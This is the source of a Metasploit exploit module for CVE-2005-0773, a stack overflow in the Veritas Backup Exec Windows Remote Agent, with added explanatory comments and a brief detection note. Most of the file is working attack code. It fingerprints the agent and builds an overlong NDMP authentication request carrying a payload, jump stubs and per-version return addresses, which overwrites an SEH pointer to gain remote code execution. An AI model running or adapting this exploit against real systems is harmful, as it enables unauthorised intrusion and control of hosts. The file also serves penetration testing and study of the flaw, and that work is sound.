Path: blob/master/modules/exploits/windows/backupexec/remote_agent.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit exploit module for CVE-2005-0773, a stack buffer overflow in the
# Veritas Backup Exec Windows Remote Agent. The overflow is reached through an
# NDMP connect_client_auth request (message name 0x901) whose authentication
# type is 3 and whose password field is far longer than the agent expects.
# connect/disconnect, ndmp_send, ndmp_recv and ndmp_info come from the NDMP
# mixin; RPORT defaults to 10000 (see register_options).
#
# Defensive note: the request shape is the detection handle here — a type-3
# client authentication message carrying an 8192-byte password is not something
# a legitimate backup client emits.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::NDMP

  # Registers module metadata (references, payload constraints, targets) and
  # the RPORT option. Two targets are defined; each carries a pair of return
  # addresses in 'Rets' that the exploit method indexes by agent version.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the Veritas
          BackupExec Windows Agent software. This vulnerability occurs
          when a client authentication request is received with type
          '3' and a long password argument. Reliable execution is
          obtained by abusing the stack buffer overflow to smash a SEH
          pointer.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-0773'],
          [ 'OSVDB', '17624'],
          [ 'BID', '14022'],
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities']
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        # 'Space' => 1024 bounds payload.encoded.length; the exploit method
        # relies on this so that 3536 - length never goes negative.
        'Payload' => {
          'Space' => 1024,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
        'Platform' => %w{win},
        'Targets' => [
          [
            'Veritas BE 9.0/9.1/10.0 (All Windows)',
            {
              'Platform' => 'win',
              'Rets' => [ 0x0140f8d5, 0x014261b0 ],
            },
          ],
          [
            'Veritas BE 9.0/9.1/10.0 (Windows 2000)',
            {
              'Platform' => 'win',
              'Rets' => [ 0x75022ac4, 0x75022ac4 ],
            },
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2005-06-22',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(10000)
      ]
    )
  end

  # Fingerprints the remote agent through the NDMP mixin's ndmp_info.
  #
  # Returns CheckCode::Appears when the reported vendor matches /VERITAS/i and
  # the reported version string is exactly "4.2" or "5.1"; CheckCode::Safe in
  # every other case. Note that a missing info reply (ndmp_info returning nil,
  # or no 'Version' key) also yields Safe rather than an "unknown" result, so a
  # filtered or non-responding service reads as not vulnerable.
  # NOTE(review): ^ and $ anchor per line in Ruby; \A and \z would pin the whole
  # string — presumably harmless for a short version field, but worth confirming.
  #
  # @return [Exploit::CheckCode]
  def check
    info = ndmp_info()
    if (info and info['Version'])
      vprint_status(" Vendor: #{info['Vendor']}")
      vprint_status("Product: #{info['Product']}")
      vprint_status("Version: #{info['Version']}")

      if (info['Vendor'] =~ /VERITAS/i and info['Version'] =~ /^(4\.2|5\.1)$/)
        return Exploit::CheckCode::Appears
      end
    end
    return Exploit::CheckCode::Safe
  end

  # Builds and sends the overlong connect_client_auth request.
  #
  # The password field is 8192 bytes of random alphanumerics. The encoded
  # payload is written so that it ends at offset 3536, and two fixed regions
  # (starting at 3536 and at 4524) each hold a short jump, a return address from
  # target['Rets'], and a backwards jump into the payload. Per the inline
  # comments, the first region is the one the 10.0 agent consumes and the
  # second the 9.0/9.1 agent, which is why each target carries two addresses.
  #
  # The reply read after the send is expected to fail (the agent has been
  # overflowed). The value of the initial ndmp_recv is stored in `resp` but
  # never used — presumably it just drains the server's greeting.
  #
  # @return [void]
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    # Drain the server's first message; `resp` is not inspected afterwards.
    resp = ndmp_recv()

    # 512-byte username; per the description the overflow is driven by the
    # password field, not this one.
    username = 'X' * 512
    password = rand_text_alphanumeric(8192)

    # Place our payload early in the request and jump backwards into it
    # (payload occupies [3536 - length, 3536); 'Space' => 1024 keeps the
    # start offset non-negative).
    password[3536 - payload.encoded.length, payload.encoded.length] = payload.encoded

    # This offset is required for version 10.0
    password[3536, 2] = "\xeb\x06"
    password[3540, 4] = [ target['Rets'][1] ].pack('V')
    # Negative displacement packed as 32-bit little-endian (two's complement).
    password[3544, 5] = "\xe9" + [-1037].pack('V')

    # This offset is required for version 9.0/9.1
    password[4524, 2] = "\xeb\x06"
    password[4528, 4] = [ target['Rets'][0] ].pack('V')
    password[4532, 5] = "\xe9" + [-2025].pack('V')

    # Create the authentication request: a fixed 7-word NDMP header ('N' =
    # 32-bit big-endian), then length-prefixed username and password, then a
    # trailing word.
    auth = [
      1, # Sequence number
      Time.now.to_i, # Current time
      0, # Message type (request)
      0x901, # Message name (connect_client_auth)
      0, # Reply sequence number
      0, # Error status
      3 # Authentication type
    ].pack('NNNNNNN') +
    [ username.length ].pack('N') + username +
    [ password.length ].pack('N') + password +
    [ 4 ].pack('N')

    print_status("Sending authentication request...")
    ndmp_send(auth)

    # Attempt to read a reply (this should fail)
    ndmp_recv()

    handler
    disconnect
  end
end